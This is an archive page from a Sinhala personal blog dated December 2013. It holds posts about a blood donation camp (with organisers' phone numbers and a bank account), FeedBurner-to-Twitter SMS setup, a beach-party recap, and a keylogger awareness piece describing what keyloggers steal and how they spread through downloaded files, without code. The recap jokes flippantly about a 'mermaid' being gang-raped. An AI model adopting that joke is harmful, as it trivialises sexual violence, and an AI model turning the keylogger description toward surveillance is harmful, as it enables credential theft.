Archive for December 2013

මා වැනි බිලින්ද 
මරුවා යයිද කැන්දා 
අනේ ඒ හින්දා 
දෙන්න ලේ බිඳු මාම නැන්දා



ඔව් .. ඔයාටත් පුලුවන්නම් මේ වගේ අසරණ ජීවිතයක් බේරා ගන්න .. පුළුවන් ..2014 පටන් ගද්දිම ඔයාට ඒ වගේ පින් සිද්ද වෙන වැඩක් කරන්න හොදම අවස්තාවක් ලැබිල තියෙනෙව .. බුකියේ කට්ටිය මේ 2014 ඒ වගේ වැඩකින් පටන් ගන්නයි යන්නේ .. බුකියේ කට්ටිය හැමෝම සියනැ කෝරලේට එකතු වෙලා ලේ දන් දීමේ කදවුරක් පවත්වන්නයි යන්නේ .. මේ වෙනකොට්ට ඊට අවශ්‍ය සියලුම කටයුතු සම්පාදනය වෙමින් පවතිනවා .. 

ම්ම්ම් ... මේක සංවිදානය කරන්න යන්නේ ගම්පහ නගරයේමයි .. ඒ හැමෝටම වගේ එන්න ලේසි කියල හිතෙන නිසා ... ලබන ජනවාරි මාසයේ 12 වෙනිදා ඒ කියන්නේ ඉරිදාවක තමයි මේක පවත්වන්න නියමිත .. ඒ උදේ 9 ඉදන් හවස 3 වෙනකන් ගම්පහ සිද්ධාර්ථ කුමාර මහා විද්‍යාල පරිශ්‍රයේදී .. මේ වෙනුවෙන් ජාතික ලේ බැංකුවේ වෛද්‍ය  ශිරෝමන් මහතා එදාට අපිට උදව් කරන්න සහබාගි වෙනවා .. මේ වැඩේට ලේ බැංකුවෙනුත් ලොකු සහයක් ලැබෙනේව ...

ලේ දන් දෙන හැමකෙනෙක්ටම එදාට කෑම දෙන්න බලාපොරොත්තු වෙනවා .. එත් තියෙන මුල්‍යමය හැකියාවත් එක්ක තීරණය වෙලා තියෙන්නේ කිරි පැකට් එකක් එක්ක බනිස් ගෙඩියක් ( ෆිෂ් බන් ) එන හැම කෙනෙක්ටම වගේ දෙන්න ... 150 විතර වගේ මේකට සහභාගී වෙයි කියල බලාපොරොත්තු වෙනවා ..එක්කෙනෙක්ට දල වශයෙන් රුපියල් 100ක් වෙන් කොලොත් ඒ කෑම වෙලේට හැමෝටම (120*100) 12000 වගේ මුදලක් යනවා .. ඊට අමතරව වෛද්‍යවරයාට සහ එන සේවක මණ්ඩලයට දහවල් ආහාරය දෙන්නත් බලාපොරත්තුවක් තියෙනෙව ... ඒකට අවම රැපියල් 4000ක් හෝ යාවි
ලේ දෙන්න බැරි වුනත් සහබාගී වෙන්න කැමති අය ඉන්නවා එදාට එන්න බලාගෙන ඉතිං ඒ අයටත් දවල් කෑම දෙන්න ඕනෙ.. එන ගාන අනුව තමයි ඒක වෙනස් වෙන්නෙ.... අවම තව රැපියල් 5000ක් විතර ඒවට වියදම් වේවි...

ප්‍රචාරණ වැඩ සදහාත් අපිට වියදම් කීපයක් දරන්න සිද්ධ වෙනවා.. ෆේක් අපි ටිකගෙන් ලොකු ප්‍රාණයක් ලේ එකතු වෙන්නෙ නැති වෙයි.. ගම්පහ අවට කැමති අයට සහභාගී වෙන්න පුළුවන් විදියට එයාලව දැනවත් කරන්න ප්‍රචාරණයක් කරන්න වෙනවා.. ඒකට ගනං බලපු විදියට රැපියල් 3000ක්විතර වියදම් වේවි.. පෝස්ටර් ටිකක් අපිට ලැබෙනවා.. නමුත් අපි වෙනම පෝස්ටර් ගහන්න ඕනෙ... බැනර් එකක් දාන්නත් ඕනෙ ඒකට වෙනම වියදමක් යාවි...
මේ සේරම වෙනුවෙන් අපිට ආසන්න රැපියල් 25000ක පමණ මුදලක් අවශ්‍ය වෙනවා..
සංවිධායක මණ්ඩලය මේ වෙනුවෙන් පෞද්ගලිකව මුදල් ආධාර එකතු කරලා තියෙනවා.. මේ සදහා සහය වෙන්න කැමති අය ඉන්නවනං ඔයාලටත් හැකියාවක් තියෙනවනං මේ සදහා දායක වෙන්න අවස්ථාවක් තියෙනවා...

" ඔයාලට හැකි මුදලක් ලබාදෙන්න , සියළු මුදල්වල වගකීම සංවිදායක මණ්ඩලය බාරගන්නවා..." 

 සංවිදායක මණ්ඩලයට  එන අය හරියටම කියන්න කීයක් එනවද කියලා බලාගන්න ඕන නිසා...



ගම්පහට එන විදිය ගැනත් දාන්නං...


-->   කොළඹ ඉදලා එනවනං 200 ගම්පහ කොළඹ බස් එකක හරි ට්‍රේන් එකේ හරි එන්න පුළුවන් ගොඩක් ට්‍රේන් ගම්පහ නතර කරනවා...

-->   කුරුණැගල නුවර ඉදලා එන කෙනෙකුට කොළඹ බස් එකක ඇවිත් යක්කලින් හෝ මිරිස්වත්තෙන් බැහැලා ගම්පහ බස් එකක ගම්පහ ටවුන් එකට එන්න පුළුවන් යක්කල ඉදල කිලෝමීටර් 5ක් තියෙනවා මිරිස්වත්තේ ඉදලා කිලෝමීටර් 4ක් තියෙනවා... ගම්පහට
යක්කලින් බහින කෙනෙක්ට 201,231,181,215, ඕනම බස් එකක එන්න පුළුවන්
මිරිස්වත්තෙන් බහින කෙනෙක්ට 200,202,228/1,205,214, ඕනම එකක එන්න පුළුවන් ඇවිත් ගම්පහින් බැස්සම හොයාගන්න ලේසියි...
නුවර, කුරුණෑගලින් එන අයටත් ට්‍රේන් එකේ එන්න පුළුවන් ඇවිත් ගම්පහින් බහින්න... (ගම්පහ නවත්තන ඒවද කියලා බලලා එන්න)

-->   වත්තල ජාඇල පැත්තෙන් එන කෙනෙක්ට
වත්තල කෙනෙක්නං කඳානට ඇවිත් 276 බස් එකේ ගම්පහට එන්න පුළුවන්
නැත්නං ජා ඇලටම ඇවිත් 201 ජා ඇල - ගම්පහ හෝ 201 ජා ඇල නිට්ටඹුව බස් එකක එන්න පුළුවන්

-->    කටුනායක , මිනුවන්ගොඩ කෙනෙක්ට
270 කටුනායක - ගම්පහ බස් එකක ලේසියෙන්ම එන්න පුළුවන් මිනුවන්ගොඩට ඇවිල්ලයි බස් එක ගම්පහට එන්නේ...

-->    මීගමුව සීදුව පැත්තෙ කෙනෙක්ට
244 මීගමුව ගම්පහ බස් එකක එන්න පුළුවන් කොටුගොඩ හරහා එන්නෙ..

-->    දිවුලපිටිය ගිරිඋල්ල පැත්තෙ අයට
ගිරිඋල්ලෙ කෙනෙක්ට දිවුල පිටියට ඇවිත් 211 ගම්පහ දිවුලපිටිය බස් එකක එන්න පුළුවන්
නැත්නම් 221 නිට්ටඹූව බස් එකක නිට්ටඹුවට ඇවිත් 201 නිට්ටඹුව ගම්පහ බස් එකක එන්න පුළුවන්

-->   ගම්පහට ඇවිත් ගම්පහ පබ්ලික් හෝල් එක( සිනමා ශාලාව තියෙන්නේ බස් ස්ටෑන්ඩ් එක ඉස්සරහා)
එතනින් පොඩ්ඩක් ඉස්සරහට එනකොට තියෙනවා HDFC බැංකුව එතන තියෙන පාරෙන් හැරිලා මීටර් 5ක් 6ක් විතර ඇතුලට එන්න ඕනෙ පාර අයිනෙම ස්කෝලෙ තියෙනවා... හැරෙන්න ඕනෙ තැන බැනර් 1ක් දාලා තියෙනෙව හොයාගන්න ලේසි වෙන්න....

ඔයාලගේ ආධාර මුදල් ලංකා බැංකුවේ පහත සදහන් ගිණුමට බැර කරන්න ..


ගිණුම් අංකය - 70688969
S A D S L ජයතිලක
ලංකා බැංකුව 




ඔයාලට මේ ගැන වැඩි විස්තර දැන ගන්න ඕනිනම් ඔයාල පහල තියෙන දුරකථන අංක වලට කතා කරලා විස්තර දැන ගන්න පුළුවන් .. 

 පැමිණීමේ ගැටළු ( පොඩි මල්ලි )               - 0717383167
  
මුදල් ආදාර    (මොණරී  )                           - 0717604329 
  
පැමිණීම තහවුරු කිරීම (බ්ලැක් පුමා)         - 0777615332 
                          (පොඩි සොනික්)              - 0754392827

  වෙනත් උපකාර වේනම්(ගිනි කුකුලා )      - 0714041977 


ඔයාල හැමෝටම කරන විවුර්ත ආරාධනයක් මේක ...  ඔයාලට පුලුවන්නම් මේ ගැන තව දන්නා කියන අයට කියන්න .. එහෙනම් එදාට හම්බ වෙමු ...!!!
හායි හායි බෙබීස් ... හැක හැක .. ඔන්න චකා ආව ඇ .. අපරාදෙනේ .. හැකස් .. ඔන්න අද මම ආවේ ටිකක් අමුතු වැඩ කැල්ලක් අරන් ඇ ... මේක මේ Blog ලියන අයට ටිකක් වැදගත් වෙයි කියල හිතුන නිසා මේ දාන්නේ .. මේක මේ මම හොයා ගත්ත එකක් එහෙම නෙවෙයි ඇ .. කවුද හොයා ගත්තේ කීල දන්නේ ලෑ ...  හරිද ... මම මේ ගැන දැනගත්තෙත් මේ ලගදි .. එක Web Site එකකින් ... හරි හරි .. මම කතාව කියන්නම් .. 

ඔයාල දකින්න ඇති මගේ Blog එකට ආවම මෙන්න මෙහෙම එකක් .. ඔය දකුණු පැත්තේ උඩින් තියෙන්නේ ..


අපේ Blog Post ඔයාගේ ෆෝන් එකටම ගෙන්න ගන්න ...   :)
" Follow Chakas_kolla " කියල Type කරලා 40404 දැන්ම SMS එකක් යවන්න ...
(අයකිරීම් නැත )


හැ .. මේක ගොඩ දෙනෙක් මගෙන් ඇහුව මේක කරන්නේ කොහොමද කියල .. හැමෝටම කියන්න කම්මැලි නිසා මම මේක Blog එකේ ලියන්න හිතුව .. ආයිත් කියනවා මේක මමත් වෙන කෙනෙක්ගෙන් දන ගත්ත දෙයක් මිසක් මගේ දෙයක් නෙවෙයි . අනිත් අයටත් දැනගන්නයි බ්ලොග් එකේ දැම්මේ .. කතෘ අයිති ඉල්ලලා උඩ පනින්න එපා ... :3 ...

මෙන්න මෙහෙමයි මේක කරන්නේ .. මේකට මුලික සුදුසුකම් කීපයක් තියෙන්න ඕනි .. 

            01 )  ඔයාගේ Blog එක Feed Burner දාල තියෙන්න ඕනි ..  
            02 )  ඔයාට Twitter එකවුන්ට් එකක් තියෙන්න ඕනි ..


හරි මේවා තියෙන අය ටිකක් පහලට ගිහිල්ල බලන්න මම මේක කරන හැටි අනිත් අයට කියල දෙනකම් ඇ .. :D

අපි මුලින්ම බලමු කොහොමද අපේ බ්ලොග් එකට Feed Burner දාගන්නේ කියල ..

-->  ඔයා මුලින්ම මෙන්න මෙතනින් යන්න  .. 

-->  එකට ගියාම ඔයාට Google එකට Log වෙන්න කියනවා ..අන්න එතනට ඔයා ඔයාගේ G-mail එකයි Password එකයි දීල ලොග් වෙන්න .. 

-->  ඊට පස්සේ ඔයාට මෙන්න මෙහෙම Page එකක් එයි .. ඔය මම රතු පාට කොටු කරලා තියෙන තැන ඔයාගේ Blog එකේ Link එක ටයිප් කරන්න ...( http:// එක්ක ඇ ) 



-->  ඊට පස්සේ එතන තියෙන Next Button එක ක්ලික් කරන්න .. හරිද ..

-->  ඊට පස්සේ ඔයාට මේ  පහල තියෙනෙව වගේ Page එකක් එයි .. එකේ ඔය තියෙන විදියටම තියෙද්දී Next කියන එක දෙන්න ... 



--> ඊලගට එන Page එකටත් මුකුත්ම නොකර Next දෙන්න .. .හරිනේ .

-->  දැන් ඔයාට ඊලගට මෙන්න මෙහෙම Page එකක් එයි ... අන්න එකේ මම ඔය උඩින්ම රතු පාටින් කොටු කරලා තියෙන තැන තියෙන ලින්ක් එක තමා ඔයාගේ බ්ලොග් එකේ Feed Link එක .. හරි ..ඔකේ තව Step තියෙනෙවා .. දැනට ඒවාට දිගට හරහට Next දෙන්න .. ... හැක හැක හැක ...




 ඇ ..දැන් Feed seen එක ඉවරයි ... දැන් ඔයාට තියෙන්නේ Twitter එකවුන්ට් එකක් හදාගන්න එක ..එකනම් ඉතින් ඔය හැමෝටම පුළුවන්නේ ... Email එකක් තියේනම් කොරාගන්න අමාරු ලෑ ... එක ගැන මම කියල දෙන්න ඕනි නැහැනේ .. මෙන්න මෙතනින්  ගිහින් ඒ වැඩේ කොලා ගන්නකො ...



හරි ..එහෙනම් .. දැන් මම කියන්නම් මේකේ වැදගත්ම වැඩේ ...



ඔයා දැන් ඔයාගේ Twitter account එකටත් log වෙලා , ඔයාගේ Feed Burner එකවුන්ට් එකටත් ලොග් වෙන්න ... 

-->  ඔයාගේ Feed Burner එකට ලොග් උනාම එතන ඔයාගේ Blog එකේ  නම වැටිලා ඇති .. දැන් එක උඩ ක්ලික් කරන්න ...

-->  එතකොට ඔය පහල තියෙනව වගේ Page එකක් එයි .. අන්න එකේ මම ඔය කොටු කරලා තියෙන තැන ක්ලික්  කොරන්න .. 




-->  එතකොට එන Page එකේ Screen Shot එකක් පහල තියෙනෙව ..එකේ කොටු කරලා තියෙන එක උඩත් ක්ලික් කරන්න .. 




-->  දැන් ඔයාට එයි ඔය මම පහල දාල තියෙන එක වගේ Page එකක් .. හරිනේ ..




-->   දැන් ඔයා ඔයාගේ Twitter එකවුන්ට එකෙන් වැඩගන්න වෙලාව .. ඔය මම කොටු කරලා තියෙන එක උඩ ක්ලික් කරන්න .. එතකොට ඔයාට ඔයාගේ Twitter account එකට ලොග් වෙන්න කියයි .. ලොග් වෙලානම් ඉන්නේ මෙන්න මෙහෙම එකක් එයි .. ලොග් වෙලා නැති අයටත් ලොග් උනාම මෙම මෙම ඒයි .. 


--> දැන් මම එකේ ඔය කොටු කරලා තියෙන එක උඩ ක්ලික් කරන්න ..


-->  දැන් ආයිත් ඔයාගේ FeedBurner එකට Redirect වෙයි .. දැන් ඔයාට ආයිත් මෙන්න මෙහෙම Page එකක් පෙන්නයි ..එකේ මම ඔය පෙන්නලා තියෙනෙව වගේ එකක් ඇති .. ඒ විදියටම Select කරන්න .. ඔයාට කැමති වෙන විදියකටනම් ඒ විදියට  කමක් ලෑ ..



-->  දැන් ඒ Page එකේ පහළින්ම ඇති Activate කියල බොත්තමක් .. දැන් අන්න එක ක්ලික් කරන්න .. හරිනේ .. දැන් වැඩේ හරි .. හම්මෝ මට හති ..

-->  දැන් ඔයා ඔයාගේ Twitter එකවුන්ට් එකේ ඔයාගේ Username එක හොයාගන්න .. එක ඔයාගේ Profile එකට ගියාම Address bar එකේ වැටිලා තියෙනෙව .. "twitter.com/" කියන එකට පස්සේ වැටිලා තියෙන්නේ එක තමා .. :

දැන් වැඩේ හරියටම හරි .. දැන් ඔයා කස්ටියට කියන්න එයාලගේ Phone වලින් මෙන්න මෙහෙම කරන්න කියල .. 

Follow(හිස්තැනක්) ඔයාගේ Username එක ටයිප් කර 40404          SMS  එකක් යවන්න කියල .. දැන් ඔයා ඔයාගේ Blog එකට Post එකක් දාපු ගමන් එක Auto ම ඔයාගේ Twitter එකට වටෙනේව ... Twitter එකට වැටෙන එක  Register උන Phone නම්බර වලට යනවා .. ආසයි නේද .. හා හැක .. එහෙනම් වැඩේ ගොඩනේ .. 

එහෙනම් මගෙත් ඇගිලි රිදෙන නිසා මම යන්නම් ඇ .. ආදරෙයි ඔක්කොටම .. :P 
මේ වැඩේ ගැන ඔයාට ආස හිතුනනම් මේකට Comment එකක් දාල Share එකකුත් දාල යන්න .. .. ..
 මේ ඔයාගේ Phone එකෙන් " Follow Chakas_kolla " කියල ටයිප් කරලා 40404 මැසේජ් එකක් දාල මගේ Blog post ඔයාගේ Phone එකටම ගෙන්න ගන්න ඇ ... හැක හැක .. 

එහෙනම් මම ගියා ..ආයි එනකම් ජය වේවා ..!!

 ( බැක්ග්‍රවුන්ඩ් සවුන්ඩ් කටෙන් දා ගන්න ... )

.......ටි ටි ........................................

Season 01 Episode 01 මෙතැනින් කියවන්න !
<<< අපි පිස්සෝ සීසන් 01 එපිසෝඩ් 02 >>>

සැ . යු .මෙහි  එන සියලුම  නම් ගම මනක්කල්පිතය 


යට ගිය දවස අංගොඩ අගනා ගනයේ පිස්සන් දෙදෙනෙක් වාසය කළේය ...එකෙක්ට අපි නිමල් කියමු .. අනිකට අපි සුනිල් කියමු .. දිනක් මොවුන් දෙදෙනා පාරේ ඇවිද යමින්  සිටින විට පාරේ අමුතු හැඩේ දුබුරු පාටට හුරු ගුලියක් දැක්කේය .. නිමල්ට එය පෑගෙන්න ගිය අතර සුනිල් එය වලක්වා ගත්තේය ... පසුව මෙසේ කතාබහක් ඇතිවිය ..

නිමල් : අම්මෝ .. තැන්ක්ස් මචං .. මම එක දැක්කේ නැහැනේ ..

සුනිල් :  ඕව මොනවද බන් .. මේ එක මොකක්ද දන්නේ  නැහැ නේද බන් .. 

නිමල් : එක තමා බන් මාත් බැලුවේ .. මොකක්ද දන්නේ නැහැ .. 

සුනිල් : අඩු . .මම එක කාල බලන්නද ... ..ඇ එතකොට බලගත්තහැකි මොකක්ද කියල ..

නිමල් : හා එහෙනම් බලහන්කො .. මමනම් කියන්නේ ඕක බල්ලෙක්ගෙ වැඩක් ..

සුනිල් : හිටු බලන්න .. ( අතට ගෙන කටේ දමා රස කර කර කයි ) .. අම්මට සිරි .. අඩු මේක බලුබෙට්ටක් තමා බන් ...වෙලාවට උබ පෑගුවේ නැත්තේ ..


කතාව අවසානයි ...  අම්ම බනිනවා....   මම ගියා ..  ජය වේවා .. 

හි හි .. කොහොමද කට්ටියට ඇ .. මමනම් පෙරසේ පොරසේ ඉන්නවා .. :P .. .... හැක හැක .. Beach Party එකේ  අමාරුව තාම තියෙනෙව .. :3 
ආයිනම් ලබන පාටි එක එනකන් මම නාන්නේ ලෑ .. :P .. හරි හරි ... එව්වා දැන් පහු උන දේවල්නේ .. දැන් අද  ටොපික් එකට බහිමු ... හරි ..

අද මම ඔයාලට කියල දෙන්න යන්නේ ටිකක් අමුතු විදියේ කතාවක් .. කියල දෙන්න දෙයක් නෙවෙයි ... එක දෙයක් ගැන දැනුවත් කිරීමක් .. :D .. මේවා දැන් මේ ගොඩක් අය දන්නා දෙයක් .. දන්නේ නැති අයත් ඉන්නවනේ මම .වගේ .. අන්න ඒ අයට තමා මම මේ කියල දෙන්න යන්නේ හරිද ... 
අද මම කියන්නේ යන්නේ Hacking සම්බන්ද දෙයක් ගැන ... ඒ කිව්වේ මේ   Keylogger   කියන දේ ගැන .. මමත් මේ ගැන හැමදෙයක්ම දල්ලේ ලෑ .. දන්නා ටික කියල දෙන්නම්කො .. කමක් .නැහැනේ ... හරි .. 

මෙහෙමයි ... Keylogger කියන්නේ Software එකක් ..  ඒ software එකෙන් වෙන්නේ ඔයාගේ PC එක ගැන Hackers  කියන අයට හෝ තමන් විසින්ම එහෙම කියා ගන්න අයට ඔත්තු කියන එක ..
තේරුනේ  නැහැ නේද .. මෙහෙම අහගන්නකෝ ..

හිතන්නකෝ මොනම විදියකින් හරි ඔයාගේ PC   එකේ මේ Software එක ස්ථාපනය ( Install )  උනා කියල ... එතකොට ඒ Software එක මගින් ඔයාගේ PC එකේ වෙන ගොඩක් දේවල් හැකර්ස ලට Email මාර්ගයෙන් වගේ බලාගන්න පුළුවන් වෙනවා ...
දැන් ඔයාට ප්‍රශ්නයක් ඇති .. " යකෝ අපේ PC එකට එහෙම කොහෙන් Install වෙන්නද .. "  ..ඔව් ..එක සාදාරණ ප්‍රශ්නයක් .. එක වෙන්නේ මෙහෙමයි .. කවුරු හරි කෙනක් ඔයාගේ PC එකට මේක Install කලොත් .. හරි එක වෙන්නේ කොහොමද හිතෙනේව නේ .. එක වෙන්නේ මෙහෙමයි ..   

සමහර විට ඔයා Internet එකෙන් Download කරන File එකක් එක්ක මේ වගේ Keylogger එකක් ඔයාගේ PC එකට එන්න පුළුවන් .. Install වෙන්නේ Auto ... ඒ කියන්නේ ඒ FILE එකට කවුරු හරි කෙනෙක් Keylogger එකක් Bind කරලා තියෙන්න පුළුවන් .. එතකොට Keylogger එක ඔයාගේ කොම්පීතලේ ස්ථාපනය උනාම මෙන්න මේ වගේ දේවල් තමා වෙන්නේ .. හාට් ඇටාක් තියෙන එවුන් කියවන්න එපා .. 

-->  ඔයා කොම්පීතලේ ටයිප් කරන හැම අකුරක් වචනයක් ඉලක්කමක් පාසා හැකර් ට Email එකක් යනවා ... :3

-->  ඔයාගේ කොම්පීතලේ විනාඩි ගානෙන් ගානට Screen Shots හැකර්ට Email මාර්ගෙන් යනවා ..

-->  ඔයා Internet එකේ කරන හැම වැඩක්ම හැකර්ට බලන්න පුළුවන් .. 

-->  කොම්පීතලේ on/off කලපු වෙලාව බලාගන්න පුළුවන් ..

-->  Encrypt කරලා තියෙන Files වල Data email මාර්ගෙන් හැකර් ට යවනවා ..

-->  ඔයා කොනෙක්ට් වෙන කොනෙක්ෂන් ගැන රිපෝට් කරනවා ..

-->  ඔයා Printout එකක් ගත්තොත් එකේ Soft කොපි එකක් හැකර්ට Mail එකක් විදියට යනවා ...




හැක හැක .. ඔය  තියෙන්නේ Keylogger වලින් වෙන  දේවල් වලින් ටිකක් විතරයි ... තව තියෙනෙව .. අපි අහලවත් නැති දේවල් ..ඒවා Keylogger එකෙන් එකට වෙනස් වෙනවා ...   :3
මේවා හැකින් වලටම විතරක් නෙවෙයි .. හොද දේවල් වලටත් යොදා ගන්නවා ... ගොඩක් System Admin ල මේව යොදා ගන්නවා Company වල සේවකයන්ගේ වැඩ ගැන හොයන්න .. සමහර දෙමව්පියෝ මේවා දානවා ළමයින්ගේ වැඩ ගැන හොයන්න .. බලන්න ඔයාගේ එකෙත් කියල .. :3 
පරිස්සමින් මේවගේ Keylogger එකක් මගින් හැකර් කෙනෙකුට ඔයාගේ Facebook , E-mail විතරක් නෙවෙයි Bank එකවුන්ට් පවා හැක් කරන්න පුළුවන් .. ඔයා Bank එකවුන්ට් වගේ Use කරද්දී Virtual keyboard එකක් පාවිච්චි කරන එක ටිකක් හොදයි .. තව මේවගෙන් බේරෙන්න Anti-Keylogger කියල software  තියෙනව .. හැබැයි ඒවත් එක්ක Keylogger දෙන අයත් ඉන්නවා ... :P
වයිරස් ගාඩ් වලින් නම් ඒ හැටි ප්‍රයෝජනයක් ලෑ .. 


....  දැන්නම් ඇති වගේ මට ... එහෙනම් මම අදට ගියා ඇ .. මන් කවද හරි කියල දෙන්නම් ඔයාලට Keylogger එකක් හදන හැටි .. ;) .. 
එහෙනම් ආයිත් සෙට්  වෙමු ...
අහ මේ .. මේ Post එක හොදා වගේ ත්රුනොත් යාලුවන්ටත් බලන්න Facebook , Twitter Share පාරක් දාන්න ඇ .. කොමෙන්ට් එකකුත් කොටලම යන්නකෝ ,... 



එහෙනම් කට්ටියට ජයෙන් ජයම වේවා ... 

මම වන චකස් මෙහෙම බ්ලොග් ලියන්න ගෙන වැඩි කාලයක් නොවේ .. මේ දෙසැමබර් මුල පටන් ගත්තා ...  සයිබර් බීච් පාර්ටි ගැන දැන ගත්තේ ඊට සතියකට පසුවය .. එදා පටන් ගෙදර ශේප් කර ගැනීමට මහත් වෙහෙසක් දැරුවෙමි .. ප්‍රයත්නය සාර්ථක විය .. 

අපෙ ගෙදර සෙට් එකයි චානු කියල අයිය කෙනෙකුයි එක්ක ගෙදරින් ආවේ 7ට විතරය .. එද්දී උන වැඩ මාරය.. කුජීතය ... :3 .
ආව ගමන් සංවිදායක මණ්ඩලය අපිව සත්තු ගොඩට දැම්මේය ...  අනුකම්පා  විරහිතව මාව පුසෙක් කළේය ... ඊට පස්සේ අපිට සෙල්ලන් කරන්න කිව්වේය ... සෙල්ලම අනිත් උන්ගේ නැටි ඇල්ලීමය ... අපේ නැට්ට කැඩුන නිසා අපි උඩින්ම චකබ්ලාස්ට් විය ...  නැටි නැති කපුටෝ ගේම දෙන්නේය .. උන් දින්නේය ... 

ඊලගා අපිට අපෙ නම සමග අපි ලියන බ්ලොග් එක  කීමට කීවේය ...  අහිංසක ෆේක් අපි එතැනදී අපේ පිවිතුරු බව ලොවට පුජා කළේය ... එතනින් පසු වමනේ යන සීන් එකක් දුන්නේය .. ඒ පොල්ලක් වටේ කරකීමයි ... කණ්ඩායමකට දහයක් සෙට් කරගන්න කිව්වත් අපිට හිටියේ 9 දෙනෙකි .. අනිත් උන්ට 10 දෙනෙකි .. ඒ නිසා අපි පැරදුනේය .. :P




ඊලගට හොදම හරිය ආවේය .. ඒ කෑම කෑමේ අවස්ථාවයි ... ගොඩක් අයව හම්බ උනේ ඒ වෙලෙය .. :3 

කෑම කෑවට පස්සේ  හැමෝටම වැඩ විය .. ලොකු ලොකු වැඩය .. මඩ ව්‍යාපාරයට කට්ටිය පස් එකතු කලේ ඊලගටය ...   
නැවේ නැති උන් ගොඩක් නාගත්තේය .. සමහරු ඇදගෙන නැවේය ... අනිත්  එවුන්ට නෑමට සැල්ස්වීම කෙරෙහි රුවන් අයියට සහ සුදු මහත්තය ඇතුළු සම්භාවනීය පිරිසට මාගේ මෙව්වා එක ... තොපිට මාව නැවීමට නොහැකි විය .. :3 නැවේ නැත්තේ DJ කරපු අයිය විතරයිද කොහෙද .. සමිය සල්ලි තිබු නිසා බෙරුනේය ...

නමුත් මට ඊට වඩා ලොල් සීන් විය .. ඊට වගකිව යුත්තේය ගොන් රජාය .. මාත් එක්ක දුවගෙන ගොස් මුහුදට පනිමු කිව්වා ඌ දෙනෝදාහක් ඉදිරියේ මාව මුහුදට තල්ලු කර ඌ ගොඩට ආවේය ... :3  
( යකෝ අපේ පිටිපස්සෙන් හිටිය උන් බලන් ඉදන් පැය බාගයක් විතර නක්කලෙට හිනා වෙලා යකු .. >_< )
මන් අහන්නේ සුනාමියක් එහෙම ආවනම් ලංකාවේ බ්ලොග් කීයක් විනාසද ..
සමහරු නිනව් නැති විය .. ඊට වගකිව යුත්තේ කොටට ඇදපු සුද්දීයෝය .. 



ඊට පස්සේ මම ගොඩ ආවේ සැහෙන වෙලාවකට පස්සෙය ..  ඒ මම මුහුදේ ඉන්නතුරු අපේ අයියගේ වැඩ මට ආරංචි විය .. :3
හිත හොද උන් එමටය .. එනම් හැමෝම එහෙමය .. මම කොහොමද කියා මට පැවසිය නොහැක .. ඔයාලම කියන්ට .. 
දියකිදුරියක්ද අපේ බ්ලොග් කරුවන් අතින් සමුහ දුසනයට බදුන් විය .. මෙය සමස්ත බ්ලොග්කරුවන් වෙත කරපු මහත් නින්දාවකි .. මම ඒ ගැන මුකුත්ම කියන්නේ නැහැ ...( අනේ උගේ පතිවත ) එක බලන්න මෙතැනින් යන්න ... 

එද්දී මට බයක් තිබුණි .. ඒ මම පොඩිම එකා නිසාය .. ආවම මාව හලයි යන බියද තිබුණි .. නමුත් අයියල අක්කල අංකල්ල එසේ මාව හැලුවේ .නැත ... උන්ට පිං .. මගේ වයස ඔප්පු කිරීමට මට මහත් වෙහෙසක් දැරීමට සිදුවිය ... තාමත් මම කියන්නේ මගේ වයස 15 ... 
 අන්තිමට අපි හැමෝම නැටුවේය .. නටුවේ නැති උන තවත් බිව්වේය .. නටල නටල වෙරි හිදුනේය .. ආතල් කෝටියකි .. :3 

කෙසේ හෝ ඒ සුන්දර හෝර කිහිපය එසේ අවසන් විය ...හිතේ ලොකු දුකක් සමග අපි පිටත් වීමට සැරසුනේය .. හැමෝම අතින් අල්ලාගෙන බදාගෙන වඩාගෙන "හරි මචං .. අයි සෙට් වෙමු "  කියද්දී මාර ෆිට් එකක් ආවේය .. හැමෝම සුහද විය .. වයස් බේදය නොදැනුනි ...  නලින් අංකල් අයියෙක් විය ..:P

දුකින් වුනත් එන්ට පිටත් වුනු අපිට මේ පෝස්ට් එක ලියද්දිත් හරියට කෙලින් ඉන්නට අමාරුය .. මටත් අනිත් එවුන්ට කියන්න තියෙන්නේ ...

"හරි මචං .. කොහොම හරි ආයිත් සෙට් වෙමු " ...




මේ මමනම් නෙවෙයි ඇ .. 







මුහුදේ සිත්තරී 


 අපේ එවුන් සාස්තර අහනවා ... :P

හැක හැක ..

 මුනම් ජැක්සන් වගේ ඕයි ..


මෙව්වා ගැන කියන්න දන්නේ ලෑ ..





මගේ බ්ලොග් එකේ මඩ නැති නිසා උඩ පැන්න එවුන් බිමට ගැනීම සදහා මෙමෙ චායාරුප පසුව එක් කරමි .

( මුලාශ්‍ර සමියාගේ පුංචි ලෝකයෙනි )
























මෙම පෝස්ටුව ඉදිරියටත් යාවත්කාලීන කිරීමට බලාපොරොත්තු වේ .. :D

හරි ... කොහොමද කට්ටියට ඇ ...හොදින් ඉන්නවා නේද ... මැරිලා නැහැනේ ... දන්න්නවද අද කියන්න  යන්නේ  මොකක්ද කියල ... මේක ගොඩක් වැදගත් දෙයක් වෙයි .. මේ කතා කරන්න යන මාතෘකාව ගොඩක් යට ප්‍රශ්නයක් වෙලා  තියෙන දෙයක් ... ඇත්තටම මටත් මේ ගැටලුව තියෙනෙව .. මොකක්ද දන්නවද ..  ඔය බ්ලොග් ලියන ගොඩක් යට තියෙන ගැටලුවක්නේ තමන් අමාරුවෙන් ලියන බ්ලොග් පොස්ට් එහෙන් පිටින්ම තිරිසන් විදියට අනිත් ය කොපි කරලා තමන්ගේ වගේ දාන එක .. >_< ... ඔව් .. අපි පෝස්ට් එකක් ලියන්නේ ඒ අදාළ දේ ගැන ගොඩක් මහන්සි වෙලා හොයල , ඒ වෙනුවෙන් යම්කිසි කාලයක් වැය කරලා ... එහෙම මහන්සියෙන් ලියන පෝස්ට් අනිත් අය ( හොරු ) අපේ බ්ලොග් වලින් කොපි පේස්ට් කලාවට උස්සලා තමන්ගේ බ්ලොග් වල දාද්දි ඇත්තටම සාධාරණ තරහක් එනවා හිතට ...ඔය දේවල් වලට විරුද්දව ලංකාවේ නීතිනම් තියෙනෙව .. ඒ උනාට ඒ දේවල් හරියට  ක්‍රියාත්මක නොවීම ගැටළුවක් .. අනික අපි ඉතින් ඔය බ්ලොග් පෝස්ට් එකකට උසාවි පොලිසි යන්නෙත් නැහැනේ ...

